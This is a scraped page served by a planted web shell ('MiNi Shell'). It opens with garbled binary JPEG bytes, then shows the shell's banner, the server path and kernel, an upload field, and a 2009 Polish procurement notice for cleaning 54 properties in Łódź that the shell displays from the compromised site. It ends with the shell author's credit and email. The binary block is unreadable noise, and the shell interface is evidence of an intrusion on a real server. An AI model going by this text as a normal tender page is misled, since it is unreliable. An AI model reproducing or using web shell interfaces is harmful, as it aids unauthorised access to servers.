JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090402/88404-N-2009.html

<p class="kh_header"><b>Łódź: Sprzątanie 54 nieruchomości</b><br>
<b>Numer ogłoszenia: 88404 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Polesie "Zielony Rynek" , Pl. Barlickiego 11, 90-615 Łódź, woj. łódzkie, tel. 042 6330180, faks 042 6339607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielonyrynek.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja Nieruchomościami.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie 54 nieruchomości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  są usługi  związane  z  kompleksowym  sprzątaniem   54    nieruchomości, których  wykaz  wraz  z  powierzchniami   stanowi  załącznik  nr  2   do  SIWZ.


Przedmiotem   zamówienia  są  niżej  opisane  usługi  porządkowe.
1.Usuwanie  odpadów  i  innych  zanieczyszczeń  z  pomieszczeń  przeznaczonych  do ogólnego użytku - klatki schodowe, korytarze, wc ogólne itp. codziennie  oraz  innych pomieszczeń - pralnie, suszarnie, strychy, korytarze piwniczne itp. jeden raz w miesiącu.
2.Mycie pomieszczeń:
- co najmniej raz na dwa tygodnie klatek schodowych, korytarzy.
- jeden   raz   w  miesiącu   drzwi   wejściowych   do   pomieszczeń   ogólnego  użytku, ścian   pokrytych   
   materiałami   zmywalnymi,   tablic    z   oznaczeniem   nazw   ulic,  tablic   z   numerem   porządkowym     
   nieruchomości,   gablot,   tablic  informacyjnych.
- trzy  razy  w  roku  (w  przypadku  nagłego  zabrudzenia  niezwłocznie) okien w klatkach   schodowych    
   i   innych    pomieszczeniach    przeznaczonych    do    ogólnego   użytku.
3.Usuwanie odpadów i innych zanieczyszczeń z terenu nieruchomości - podwórza, chodnika, prześwitów bramowych,  koszy   przydomowych,  włazów   na    studzienkach   ściekowych   i   telekomunikacyjnych.  
4.Zmywanie  chodnika  w  okresie  od  kwietnia  do  października  w godzinach od 9.00 do 11.00 zgodnie  z   Uchwałą Nr LXII/1159/06 Rady Miejskiej w Łodzi z dnia 1 lutego 2006 r 
5.Oczyszczanie ze śniegu, lodu i błota terenu nieruchomości w zakresie  wymienionym w pkt. 3 w tym także wpustów deszczowych, zasuw wodnych i gazowych. Usuwanie śliskości nawierzchni. Pryzmowanie śniegu po opadach ze zwróceniem szczególnej uwagi na łatwy dostęp do hydrantów ulicznych, przeciwpożarowych, włazów studzienek telekomunikacyjnych  i  energetycznych,  kontenerów  na  nieczystości  stałe.
6.Czynności wymienione w pkt. 3 i 5 winny być wykonane do godziny 8.00 rano. W przypadku późniejszego zanieczyszczenia lub  opadów śniegu czynności winny być wykonywane ponownie.
7.Pielęgnowanie tj. odchwaszczanie, przekopywanie, okopywanie trawników, kwietników, krzewów na terenie nieruchomości i przed nią do krawężnika jezdni. Uzupełnianie naniesień roślinnych oraz wysiewanie trawy (naniesienia roślinne i nasiona trawy dostarcza  Zleceniodawca).
 Koszenie  trawy  i  przycinanie  żywopłotów  w  miarę  potrzeb, nie  rzadziej  niż  dwa razy   w  roku,  w  okresie  od   1 kwietnia  do  31 października  każdego  roku.
8.Usuwanie odpadów i innych zanieczyszczeń z terenów zielonych w okresie zimowym tj. od 1 listopada do 31 marca każdego roku.
9.Wykonywanie czynności związanych z dezynfekcją i deratyzacją pomieszczeń przeznaczonych do ogólnego użytku i terenu nieruchomości - wykładanie trutek na gryzonie, zmywanie powierzchni klatek schodowych środkami dezynfekującymi - w zakresie ustalonym przez Państwowego Powiatowego Inspektora Sanitarnego i obowiązujące przepisy - Uchwałę Nr LXII/1159/06 Rady Miejskiej w Łodzi z dnia 1 lutego 2006r. Wykonywanie okresowych (w okresie letnim co najmniej raz w tygodniu) dezynfekcji i dezynsekcji kontenerów na nieczystości stałe, wc ogólnych itp. (środki do dezynfekcji i deratyzacji dostarcza Zleceniobiorca).
10.Bezzwłoczne powiadamianie administratora nieruchomości o uszkodzeniach lub wadliwym działaniu instalacji i urządzeń oraz podejmowanie doraźnych działań niezbędnych dla ochrony mieszkańców przed niebezpiecznymi dla życia lub mienia skutkami uszkodzeń lub wadliwego działania instalacji lub urządzeń.
11.Powiadamianie administratora nieruchomości o przypadkach naruszania przez mieszkańców porządku domowego - prowadzeniu hodowli zwierząt w pomieszczeniach do tego niedostosowanych, umieszczaniu w pomieszczeniach przeznaczonych do ogólnego użytku przedmiotów utrudniających poruszanie się, stanowiących zagrożenie pożarowe, samowolnym zajmowaniu pomieszczeń przeznaczonych do ogólnego użytku, kradzieży energii elektrycznej, niszczeniu elementów i wyposażenia  budynku, ingerowaniu w instalacje istniejące w budynku.
12.Bezzwłoczne powiadamianie administratora nieruchomości o braku wykonywania obowiązków przez podmiot  zajmujący się wywozem nieczystości stałych.
13.Wywieszanie i zdejmowanie flag w dniach świąt i uroczystości państwowych oraz przechowywanie ich we właściwym stanie estetycznym (flagi dostarcza Zleceniobiorca).
14.Wymiana uszkodzonych żarówek w punktach świetlnych znajdujących się w częściach wspólnych  budynku,  przed  wejściami do budynków i w  prześwitach bramowych (żarówki  dostarcza  Zleceniobiorca).
15.Doręczanie    mieszkańcom   nieruchomości   korespondencji   o   charakterze   masowym.
16.Wykonywanie innych czynności w zakresie utrzymania porządku i czystości, wynikających z   obowiązujących   przepisów   i   zarządzeń   właściwych  organów.
17.Wykonywanie innych zaleceń administratora nieruchomości dotyczących realizacji niniejszej umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.20.00-0, 90.62.00.00-9, 90.91.12.00-8, 77.31.00.00-6, 90.92.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O  udzielenie    zamówienia     mogą    ubiegać    się     wykonawcy,   którzy:

   1)  Posiadają    uprawnienia    do    wykonywania    określonej    działalności    lub    czynności. 

   2)  Posiadają    niezbędną   wiedzę   i   doświadczenie    oraz    dysponują   potencjałem  technicznym    
        i    osobami    zdolnymi     do    wykonania   zamówienia.

   3) Znajdują  się  w  sytuacji  ekonomicznej  i  finansowej   zapewniającej   wykonanie    zamówienia.

   4) Nie    podlegają    wykluczeniu    z    postępowania   o   udzielenie    zamówienia    na    podstawie   
        art . 24 ust.1 i  2    ustawy    Prawo   zamówień   publicznych.   
                                                                  
2.  Sposób   dokonywania    oceny    spełnienia   w/w   warunków:

 ad 1)   warunek   spełniają  wykonawcy,  którzy   prowadzą   działalność   gospodarczą   zgodną    z   
               przedmiotem  zamówienia; 

 ad 2) >   warunek   spełniają   wykonawcy,   którzy   w   okresie   ostatnich   trzech   lat   przed   wszczęciem   
                postępowania,   a   jeżeli    okres    prowadzenia    działalności    jest    krótszy   -    w   tym   okresie  
                wykonywali  należycie  usługi  porządkowe  odpowiadające  swoim  rodzajem i  wartością usługom   	    stanowiącym  przedmiot  zamówienia;
        > dysponują osobami zdolnymi do wykonywania zamówienia, lub posiadają pisemne zobowiązanie 	   innych podmiotów do udostępnienia im potencjału technicznego i osób zdolnych do wykonania 	    zamówienia;    

    ad 3)  warunek spełniają wykonawcy, którzy posiadają polisę lub inny dokument potwierdzający że są 	  ubezpieczeni od odpowiedzialności cywilnej na kwotę min. 100 000,00 zł w zakresie prowadzonej  	  działalności.
 
    ad 4)  warunek   spełniają  wykonawcy,  którzy   załączą   do   oferty    oświadczenie   o   spełnieniu  
              warunków  udziału  w  postępowaniu  i  dokumenty  wymienione  w  części  V SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W    celu     potwierdzenia,    że    wykonawca     p osiada    uprawnienia    do    wykonywania      określonej   
   działalności   lub   czynności   oraz    nie   podlegają    wykluczeniu   na   podstawie   art.24   ustawy  Prawo  
   zamówień   publicznych    do   oferty    należy    załączyć :

1.1 aktualny    odpis     z    właściwego     rejestru     albo  aktualne    zaświadczenie    o     wpisie     do   
      ewidencji     działalności   gospodarczej,  jeżeli   odrębne  przepisy   wymagają  wpisu  do   rejestru   
      lub   zgłoszenia   do  ewidencji  działalności   gospodarczej,  wystawiony    nie   wcześniej    niż  6   
      miesięcy   przed  upływem  terminu   składania  ofert .
1.2 oświadczenie,  że  spełnia  warunki  udziału  w  postępowaniu, o których  mowa  w  art. 22 ust.1    
       i   art.24   ustawy   Prawo   zamówień   publicznych (zał. nr  5);
1.3 w  przypadku   składania   oferty    przez podmioty   występujące   wspólnie  dokumenty 
       wyszczególnione w pkt.1.1  i  1.2    muszą    być    złożone   przez    każdy   podmiot;
1.4  pełnomocnictwo    w    przypadku    podmiotów    występujących     wspólnie   o     ustanowieniu   
      pełnomocnika    do  reprezentowania  ich   w   postępowaniu   o   udzielenie    zamówienia    albo  
      reprezentowania  w   postępowaniu  i  zawarciu  umowy  w   sprawie   zamówienia   publicznego.  

2. W    celu     potwierdzenia,    że     wykonawca     posiada      niezbędną   wiedzę   i    doświadczenie    oraz
     dysponuje      potencjałem     technicznym      i      osobami      zdolnymi      do    wykonania    zamówienia
     do   oferty   należy   załączyć :

2.1Wykaz   wykonanych   w    ciągu   ostatnich  trzech  lat  przed  wszczęciem  postępowania, a  jeżeli  okres  prowadzenia  działalności  jest  krótszy -  z  tego  okresu, usług  porządkowych, odpowiadających swym zakresem i wartością pracą stanowiącym przedmiot zamówienia. Należy  wykazać usługi o łącznej wartości min. 150 000,00 zł.   
2.1Dokumenty   potwierdzające, że wszystkie  usługi  wymienione  w  w/w  wykazie  wykonywane  były  należycie  ( referencje);  

3.  W   celu    potwierdzenia,   że    wykonawca   znajduje    się    w    sytuacji   ekonomicznej   i   finansowej   
     zapewniającej  wykonanie  zamówienia  do  oferty    należy    załączyć:  
   
     3.1.  kserokopie   polisy   lub   innego    dokumentu    ubezpieczenia    potwierdzającego,   że   wykonawca  
              zamówienia    jest    ubezpieczony     od    odpowiedzialności    cywilnej na kwotę min. 100 000,00 zł   	w    zakresie   prowadzonej  działalności obejmującej  okres  realizacji  prac;
     3.2  w   przypadku     załączenia    dokumentu    zawartego    na    okres  krótszy,   do   oferty   należy    
            dołączyć    zobowiązanie    o    przedłużeniu    ważności  ubezpieczenia.
     3.3  w przypadku , gdy    wykonawca  nie  posiada  ubezpieczenia OC,   do  oferty   należy   dołączyć    
            zobowiązanie    mówiące,   o    ubezpieczeniu    usług   przed    podpisaniem   umowy;     

4. W    przypadku   składania     oferty     przez     podmioty     występujące     wspólnie    dokumenty  
     wyszczególnione w pkt.2  i  3  podmioty    mogą    spełniać    łącznie;

5. Jeżeli    wykonawca    ma    siedzibę   lub    miejsce   zamieszkania    poza    terytorium    Rzeczypospolitej  
    Polskiej,   zamiast    dokumentów,   o   których   mowa   w   pkt.1.1   składa    dokument   lub   dokumenty,  
    wystawione    w    kraju,   w    którym     ma     siedzibę    lub    miejsce     zamieszkania,      potwierdzające  
    odpowiednio, że:
    5.1  nie  otwarto jego  likwidacji ani  nie  ogłoszono  upadłości;
    5.2  nie  orzeczono wobec niego zakazu  ubiegania się o zamówienie .

6. Dokumenty,   o   których    mowa    w   pkt. 5.1   i   5.2    powinny    być    wystawione  nie   wcześniej  niż   
    6 miesięcy  przed upływem terminu  składania ofert. 

7. Jeżeli   w   kraju   pochodzenia   osoby    lub   w   kraju,  w  którym   wykonawca  ma  siedzibę lub  miejsce  
    zamieszkania,  nie wydaje  się  dokumentów, o  których   mowa  w   pkt.5   zastępuje  się  je   dokumentem  
    zawierającym     oświadczenie     złożone      przed      notariuszem,    właściwym      organem      sądowym,  
    administracyjnym    albo    organem    samorządu    zawodowego  lub  gospodarczego,  odpowiednio  kraju  
    pochodzenia    osoby    lub   kraju ,  w   którym   wykonawca   ma   siedzibę   lub   miejsce    zamieszkania.

8.Dokumenty    składane   w    języku    obcym    składane    są    wraz    z    tłumaczeniem   na   język   polski  
   poświadczonym  przez  wykonawcę.

9.Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zielonyrynek.internetdsl.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Polesie Zielony Rynek
Łódź, Pl. Barlickiego 11 
pok. nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2009 godzina 10:00, miejsce: Administracja Nieruchomościami Łódź - Polesie Zielony Rynek
Łódź, Pl. Barlickiego 11 
pok. nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com